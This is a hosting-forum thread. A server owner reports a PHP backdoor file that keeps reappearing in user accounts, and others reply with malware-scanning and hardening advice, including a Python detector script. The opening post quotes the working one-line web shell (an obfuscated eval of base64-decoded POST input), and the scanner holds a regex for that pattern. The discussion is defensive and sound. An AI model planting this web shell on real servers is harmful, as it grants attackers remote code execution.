Big problem

Kevin Jaspers (Verified User, joined Jan 23, 2012, 64 messages)
Since this week I have a problem.
On every account on my server there is a folder named css with a file in it (7c32.php), and in this file is the code
<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

But if I delete it, it's back within 3 hours; I don't know what to do.

I think something is injecting my server.
What I already did: deleted all these files and folders, and changed the admin password.

But the files are already back.

Does somebody know this problem and what to do to prevent it?

Please help me.

Thanks in advance.

Greetings, Kevin
 
The public_html folder is 711 but it's still coming through.

How can I use these tools?

Feeling sick of this, don't know why this is.
 
How can I use these tools?

You should always keep your sites (Joomla CMS, Drupal CMS, WordPress) updated and current, including all modules and components. The malicious files are uploaded/created, I'd rather say, through a vulnerability of a CMS you are running there.

I'd suggest:

1. Installing Linux Malware Detect (maldet) as well as ClamAV, and checking home directories on a daily basis.
2. Installing and configuring ModSecurity.
3. Securing /tmp, /var/tmp
4. Installing and configuring CSF/LFD
5. Securing PHP
6. Forbidding upload of PHP scripts (by mime, and other signs), as some attackers hide PHP code in GIF files.

Note, Andrea as well as me (and other guys here) offer a commercial service. So if you need a professional solution you might need to hire one of us. Feel free to PM for a quote.
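The backdoor in the first post hides its parameter name with PHP hex escapes ("cod\x65" is "code" once PHP parses the double-quoted string), so a plain grep for eval(base64_decode($_POST["code"])) misses it. Added example, not code from the thread, maldet or any other tool named here: a small Python scanner for a daily home-directory check that resolves those escapes before matching; the sample files and the /home default path are constructed assumptions.

```python
import os
import re

# Constructed samples: the backdoor quoted in the thread and a harmless file.
SAMPLES = {
    "css/7c32.php": r'<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>',
    "index.php": '<?php echo "hello"; ?>',
}

# \xNN and \NNN escapes that PHP resolves inside double-quoted strings.
PHP_ESCAPE = re.compile(r'\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3}))')

def normalize_php(src: str) -> str:
    """Resolve hex/octal escapes in one pass so "cod\\x65" reads as "code"."""
    def repl(m):
        hexval, octval = m.group(1), m.group(2)
        return chr(int(hexval, 16)) if hexval is not None else chr(int(octval, 8))
    return PHP_ESCAPE.sub(repl, src)

# eval() fed directly from decoded request input, whitespace tolerant.
BACKDOOR = re.compile(
    r'eval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b',
    re.IGNORECASE,
)

def is_backdoor(src: str) -> bool:
    return BACKDOOR.search(normalize_php(src)) is not None

def scan_sources(sources: dict) -> list:
    """Return the names of in-memory sources that match; used by scan_tree and the test."""
    return sorted(name for name, src in sources.items() if is_backdoor(src))

def scan_tree(root: str, exts=(".php", ".phtml", ".php5")) -> list:
    """Walk root and return paths of PHP files that match the backdoor pattern."""
    found = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, encoding="utf-8", errors="replace") as fh:
                        found[path] = fh.read()
                except OSError:
                    continue  # unreadable file: skip rather than abort the scan
    return scan_sources(found)

if __name__ == "__main__":
    import sys
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "/home"):
        print(hit)
```

Run it as a cron job against the home directories and alert on any output; a file listed here is a decision point for the owner of that account, not a proof by itself that no other backdoor exists.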
 
The thing is that I'll do it myself because I want to learn something, but thanks.
How can I do all these things above, and what do you recommend doing?

Thanks in advance for helping.

Greetings, Kevin
 
After all this I got the problem back.
Some users, almost every user,
have the weird files after these changes.

What I did...
1. Installing Linux Malware Detect (maldet)
3. Securing /tmp, /var/tmp
4. Installing and configuring CSF/LFD
5. Securing PHP
That is what I did.

The other things I didn't know how to do and configure.

Thanks in advance.
 
This is a script used by hackers to send spam email.

If you have any Joomla or WordPress installations, update them. JCE editor for Joomla has quite a few security issues that allow third parties to upload files without logging in. Do the same for WordPress plugins and themes.
 
Okay thanks, I'll keep this in mind.
I'll send my users an email.

How can I check for outdated stuff from users?
Is there a command or program for that?
 
I did what you said about server-status.
But what can I see with this?

And I have suPHP installed, is this good?
 
Hello everyone,

As I said, I had installed maldet; after scanning I was shocked!
Everything is deleted, so I think it's good for now.
We shall see.

Thanks in advance
 
server-status will show every open connection for Apache. Might be useful. Usually you'll see many connections to a domain if it is targeted; then I'd suggest reading that domain's logs for any cross-scripting or extension hits.
 
For security reasons, I would limit access to server-status to your own IP/hostname and localhost.
 
It could be that your problem is over now, at least if your server isn't rooted, since then you won't see anything suspicious.

I would install mod_ruid2 in your case; at least you have more chance of discovering which user's script is being abused when it happens again.
http://wiki.amservers.nl/Mod_ruid2
 
@Richard,

Kevin has suPHP installed already.


@Kevin,

As I said, I had installed maldet; after scanning I was shocked!
Everything is deleted, so I think it's good for now.

Now you should take care of protection against malware being uploaded again. For that purpose you might want to use:

either this http://configserver.com/cp/cxs.html (commercial software)
or modsecurity+maldet+clamav (free)

Or even deny uploading of PHP scripts via POST.
 